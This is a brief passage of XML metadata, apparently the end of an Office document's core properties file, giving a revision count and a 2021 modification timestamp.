  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-16T01:10:01Z</dcterms:modified>
</cp:coreProperties>
</file>